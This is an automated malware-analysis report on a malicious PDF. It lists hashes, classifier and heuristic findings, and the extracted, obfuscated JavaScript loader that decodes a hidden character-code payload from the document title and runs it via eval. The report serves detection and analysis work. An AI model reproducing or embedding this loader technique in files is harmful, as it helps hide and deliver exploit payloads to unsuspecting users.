PDF malware analysis — malicious · e76ea3e60c5b9b03

MALICIOUS

PDF

44.8 KB First seen: 2026-05-09

MD5: dcc24e21e19d1db3b62e2b3d0549cfbd SHA-1: 03e908556498d43390adc131269c1cc838e1e1c1 SHA-256: e76ea3e60c5b9b034a7dd4897a271b39db462735b87f33a03fba9104b953598b

86 Risk Score

Malware Insights

The PDF file was flagged as malicious by an ML classifier with very high confidence. It contains embedded JavaScript, which is often used to download and execute further payloads or exploit vulnerabilities. The presence of JavaScript actions and streams strongly suggests an attempt to compromise the user's system. The SHA256 hash is included as a primary identifier for this suspicious file.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xB071 470 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xB071	470 bytes
SHA-256: `c16ecf4c11960ecd06ebfd7c976770e08dea0cb23742e495b6980d3f60e52a22`
Preview script First 1,000 lines of the extracted script uhk=''; v='s'+'u'; try{try{qwe()}catch(a){gsdg()}}catch(e){v+=('wqg','b'+'st');} qwe = ('webweb',v)[v+'r']; t='le'; a=["e","a","n","b","w",'v','r']; e=(t,qwe)()[a[0]+a[5]+a[1]+(a,t[0])]; ybpn=e('ti'+'tle'); s=ybpn.substr(t.length + 8,3)+'str'; q=ybpn[s](1,(1,9)); rnd=e('S'+'tring.fro'+q); q=ybpn[s](14).split('u');; e('k=q.length'); for (i = 0; i != k; i+=2) { vaayx = parseInt(q[i+1]) + parseInt(('erybjkerl',q[i])); uhk += rnd(vaayx); } e(uhk);

SHA-256: c16ecf4c11960ecd06ebfd7c976770e08dea0cb23742e495b6980d3f60e52a22

Preview script

First 1,000 lines of the extracted script

uhk='';
v='s'+'u';
try{try{qwe()}catch(a){gsdg()}}catch(e){v+=('wqg','b'+'st');}
qwe = ('webweb',v)[v+'r'];
t='le';
a=["e","a","n","b","w",'v','r'];
e=(t,qwe)()[a[0]+a[5]+a[1]+(a,t[0])];
ybpn=e('ti'+'tle');
s=ybpn.substr(t.length + 8,3)+'str';
q=ybpn[s](1,(1,9));
rnd=e('S'+'tring.fro'+q);
q=ybpn[s](14).split('u');;
e('k=q.length');
for (i = 0; i != k; i+=2) {
	vaayx = parseInt(q[i+1]) + parseInt(('erybjkerl',q[i]));
	uhk += rnd(vaayx);
}
e(uhk);

Open this report in the interactive analyzer, or submit your own file for analysis.